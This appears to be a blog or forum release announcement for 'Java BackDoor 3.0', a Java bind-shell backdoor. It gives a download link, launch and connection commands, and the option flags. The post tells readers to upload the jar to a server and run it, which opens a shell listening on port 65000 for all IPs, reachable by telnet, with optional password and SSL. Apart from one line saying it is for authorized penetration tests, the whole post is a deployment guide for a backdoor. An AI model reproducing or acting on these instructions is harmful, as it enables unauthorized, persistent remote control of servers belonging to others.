USE ONLY DURING LEGAL AND AUTHORIZED ACTIVITIES, eg Penetration Tests with a legal agreement.
Java BackDoor 3.0 released! http://www.mediafire.com/file/zmh2mk1wdn5/jbd-3.0.jar
jbd is a normal backdoor (it is NOT a revershe shell, i am working on it), written in Java. This means you can use it everywhere* without rebuild. Like any backdoor, find a way to upload it on the server, then launch it ( if you use jbd without arguments: /path/to/java -jar /path/to/jbd-3.0.jar, it will open a backdoor for all IPs at port 65000).
Use java -jar jbd-3.0.jar –help for a detailed help and use guide.
jbd has additional options (by command line, there are no config files) to
- ** NEW: SSL support to encrypt everything passing through the backdoor and keep your customer’s files safe :)
- Choose ip and/or port, shell and/or its path (for example, listen only on localhost 127.0.0.1, port 65432 executing /usr/ucb/i/dont/know/csh)
- Set a password, either in cleartext (-P option) or in MD5 (-M option); if you choose the second one, run on your PC java -jar jbd-3.0.jar –md5 YourPasswordHere to display the Java MD5 of the password, then use it on the server with the -M option (this will avoid any potential problem related to MD5)
- Easy to use, jut telnet IP PORT where you binded it
- If you created an SSL jbd, on your clients just use the java -jar jbd-3.0.jar –ssl-client to use the backdoor
- It can handle multiple clients
- IT IS NOT INTERACTIVE (do not use command like ssh or passwd!!!)
- You can use it on both Windows and *X (it was writte and tested mostly on *X operative systems)
- If a telnet session hangs, just exit (Ctrl+Alt+^], …) and open another one.
- You can kill the process closing the backdoor and disconnect all clients simply typing Bye. at the prompt, while exit will close only your session.
- You can set a password
- You can use cd command to change directory
- Compatibility with Java JDK > 1.3; theorically it should work even with Java 1.3. SSL compatibility is with JDK > 1.3, but you may give it a try on old servers!
- Tested on GNU/Linux with Java 1.5, 1.6; tested on MS Windows Xp SP2 and Win7 with Java 1.4, 1.5, 1.6. Tested on Sun OS 5.9/8 with Java 1.4. Tested on HP-UX with an unspecified JVM.
- Trace client activities on stdout (command and execution code, with –verbose you can add much more output)
- Has some problems with reverse DNS, some SO tries to do a reverse dns query even if we do not care or want it: this can cause unexpected waits, please be patient
Please post any comment if you find it useful. In addition, post any suggestion and, if you know how, give me hints to implement interactivity in Java (it seems the JVM doesn’t provide a “tty handle” API, but I am not so sure).
I am working on jbd since December 2008; it was born as a “copy/paste” of some classes from wsh backdoor spawn feature. Then I used many times on servers where I could not use C backdoors (lack of compiler) or perl ones (lack of perl). While you may not find perl/gcc or you may have issues with a compiled version of a known backdoor, with Java you have a more standard environment that does not usually fail (but this is not definetely true :)). As i started to use it in a continuous way, I added a password and an SSL funcionality, so this is a quite-tested work created by a tester for other tester: remember, use it only if you are doing something legal and approved.